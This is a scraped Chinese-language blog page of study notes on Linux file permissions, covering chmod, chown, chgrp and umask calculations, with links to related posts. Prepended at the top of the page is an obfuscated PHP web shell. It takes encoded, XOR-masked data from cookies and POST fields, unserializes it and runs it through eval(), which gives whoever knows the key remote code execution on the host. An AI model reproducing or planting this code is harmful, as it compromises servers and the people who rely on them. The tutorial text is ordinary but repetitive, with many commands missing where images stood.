$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 笔记整理:权限管理1-基础权限管理&默认权限 | Linux运维部落

笔记整理:权限管理1-基础权限管理&默认权限

权限管理:

权限的分配根据ownergroup来进行分配的

 

对于文件各个权限的意义:

r:可以使用工具查看内容

w:往里写

x:运行,提请内核发起一个进程

对于目录各个权限的意义:

r:ls 查看目录列表

 

w:可以创建或删除目录中的文件

 

x:可以使用ls -l查看文件列表,也可cd进去

 

管理命令

命令chgrp

修改所属组:

笔记整理:权限管理1-基础权限管理&默认权限 

情景1

某些文件只有读权限:比如日志存放在一个地方,每个人只能往里面写,但是不能看其他的人的日志。这时候,就可以需要只有读的权限。

 

tips:能写,但是删除,需要用户对目录的写权限。而且搭配目录的执行权限

 

情景2

笔记整理:权限管理1-基础权限管理&默认权限 

笔记整理:权限管理1-基础权限管理&默认权限 

Notes:第一个匹配了,就不会再往后看了。匹配了owner

但是,因为wang是f1的owner,所以wang还是可以修改权限的。那么其他元数据,wang用户还可以修改。

 图片4.png

情景3:

读对文件的意义:查看文件内容

笔记整理:权限管理1-基础权限管理&默认权限 

笔记整理:权限管理1-基础权限管理&默认权限 

情景4:

对文件的执行权限,和对目录的执行权限

笔记整理:权限管理1-基础权限管理&默认权限 

情景5:

这种实践并不好,文件不要随便添加执行权限

笔记整理:权限管理1-基础权限管理&默认权限 

情景6:

这种是情景5的最佳时间。X会检测是否是文件,而选择性的给目录添加x权限,对文件不“添加”x权限(如果原来有,就会保留,原来没有,也不添加)。

笔记整理:权限管理1-基础权限管理&默认权限 

命令chown

命令模式的书写方法:

方法1

     chmod   who   opt   file

     whougoa

     opt+=

     perrwx/X

方法2

       笔记整理:权限管理1-基础权限管理&默认权限

方法3参考别的文件的权限

chmod [option] … –reference=RFILE FILE …

笔记整理:权限管理1-基础权限管理&默认权限 

修改所有者:

chown usernamedir1 //ownergroup都会被修改成username

笔记整理:权限管理1-基础权限管理&默认权限 

 

chown :group dir //只更改群组

笔记整理:权限管理1-基础权限管理&默认权限 

命令chgrp

修改所属组

图片1.png

命令chmod

情景1

某些文件只有读权限:比如日志存放在一个地方,每个人只能往里面写,但是不能看其他的人的日志。这时候,就可以需要只有读的权限。

 

        tips:能写,但是删除,需要用户对目录的写权限。而且搭配目录的执行权限

 

  情景2

图片2.png笔记整理:权限管理1-基础权限管理&默认权限

  图片3.png 

    Notes:第一个匹配了,就不会再往后看了。

但是,因为wang是f1的owner,所以wang还是可以修改权限的。

图片4.png

情景3

读对文件的意义:查看文件内容

图片5.png

       图片6.png

  情景4

对目录的执行权限,和对目录的写权限,后者是删除文件时会用的

图片7.png

情景5:

图片8.png

这种实践并不好,文件最好不要随便加执行权限

情景6:

这种是情景5的最佳实践。X会检测是否是文件,而选择性的给目录添加x权限,对文件不“添加”x权限(如果原来有,就会保留,原来没有,也不添加)

图片9.png

默认权限

默认权限,通常 通过umask来设置。

umask值可以用来保留新创建文件的权限

默认权限计算方法(简洁)

新建FILE的权限:666-umask

如果执行结果中,三种成员的权限中,某一种是奇数(通常是最后一位),加1

新建DIR的权限:777-umask

结果就是正确的,不需要做其他处理。

Notes:

文件使用666来算,是为了控制安全(因为每个文件只要有x权限,就可以发起一个进程,对系统安全很有威胁)。

 

系统默认:

非特权用户的umask002

Root用户的umask022

 

umask使用方法:

设置

方法1umask xxxx

直接执行只会在当前登录时有效,保存到文件,才会永久生效。

方法2:

这种方法修改的是文件的权限,文件夹的权限,需要进行一定的计算。

笔记整理:权限管理1-基础权限管理&默认权限

模式方式显示

umask -S

笔记整理:权限管理1-基础权限管理&默认权限

输出可被调用

umask -p

常被用于将当前使用的umask保存到配置文件中,永久生效。

笔记整理:权限管理1-基础权限管理&默认权限

配置文件

可直接编辑下列文件,在文件结尾加入:umask xxx,将永久生效

全局:/etc/bashrc或者/etc/bash_profile

用户:~home/.bashrc或者~home/.bash_profile

umask书写格式

练习:修改umask,使新建文件的权限为640,新建文件夹的权限为:751

笔记整理:权限管理1-基础权限管理&默认权限

 

umask的真正含义:

从目录或文件上,屏蔽掉最大权限相应的位,从而得出相应的权限。

引言:

笔记整理:权限管理1-基础权限管理&默认权限

笔记整理:权限管理1-基础权限管理&默认权限

1:如果是文件,具体计算:

笔记整理:权限管理1-基础权限管理&默认权限

2:如果是文件夹,直接减就对了

笔记整理:权限管理1-基础权限管理&默认权限

练习:

1:当用户xiaoming/testdir目录无执行权限时,意味着无法做哪些操作?

不能cd,不能新建和删除

2:当用户小强对/testdir目录无;读权限时,意味着无法做哪些操作?

不能ls

3:当用户wangcai/testdir目录无写权限时,该目录下的制度文件file1是否可修改和删除?

不能

查询系统中所有的特殊权限位:

    find / -perm +6000

原创文章,作者:m20-吴清玲,如若转载,请注明出处:http://www.178linux.com/29110

(0)
上一篇 2016-08-05 10:18
下一篇 2016-08-05 10:18

相关推荐

  • 优云Automation:实现IT服务弹性伸缩的利器

    随着互联网业务快速持续增长,IT资源使用量按需变化成为常态,这就要求信息部门能快速响应资源使用的变化要求,对运维提出不小挑战。比如电商、在线教育等企业经常推出一些秒杀、抢红包活动,在特定时间段对资源的利用处于高峰期,之后基本处于空闲。 几年前,我们从申请采购到应用部署上线都只能人工操作,需要提前几个月开始规划。如今通过云平台能很好实现资源按需动态管理,运维人…

    系统运维 2017-03-15
  • 第十二周:httpd和lamp

    看了一下作业内容,发现所有的都在51cto上写过了。这里就不在做了。 毕竟当时几篇博客写下来,还是非常繁琐的,不想在写。 文档地址:RHEL6.8编译安装LAMP环境:httpd-2.4+mysql5.6+php5.5;基于LAMP环境部署WordPress: http://afterdawn.blog.51cto.com/7503144/1876171 配…

    Linux干货 2016-12-09
  • 服务器故障的解决方法以及基本脚本的编写

    1,当开机时一直重新启动怎么办? 在开机时就如字符界面后按下a键然后进入单用户模式,通过设置 [root@CentOS6 boot]# vim /etc/inittab 这个文件,将里面的开机启动项改为多用户模式就可。 # id:3:initdefault: “/etc/inittab” 26L, 884C 讲id这项设置完成后重新启动就好。 2,忘记roo…

    Linux干货 2017-05-15
  • zabbix low-level discover 监控端口

    zabbix通过调用jason格式的输出,实现数据的收集 获取端口的shell脚本   #!/bin/bash port_array=(`netstat -tnl|egrep -i "$1"|awk {'print $4'}|awk -F':' '{if ($NF~/^[0-9]…

    Linux干货 2016-06-09
  • Linux进程及管理(1)

    Linux进程及管理(1) 内核的功用:进程管理、文件系统、网络功能、内存管理、驱动程序、安全功能 Process: 运行中的程序的一个副本; 存在生命周期Linux内核存储进程信息的固定格式:task struct 多个任务的的task struct组件的链表:task list 进程创建: init 父子关系 进程:都由其父进程创建 fork(), cl…

    Linux干货 2015-05-28
  • linux发展史

    Linux 发展史 说明 此前对linux认识模糊一知半解,近期通过学习将自己对于linux的发展总结一下方便大家日后的学习。那Linux是目前一款非常火热的开源操作系统,可是linux是什么时候出现的,又是因为什么样的原因被开发出来的呢。以下将对linux的发展历程进行详细的讲解。    目录 一、Linux发展背景 二、UINIX的诞…

    Linux干货 2016-10-14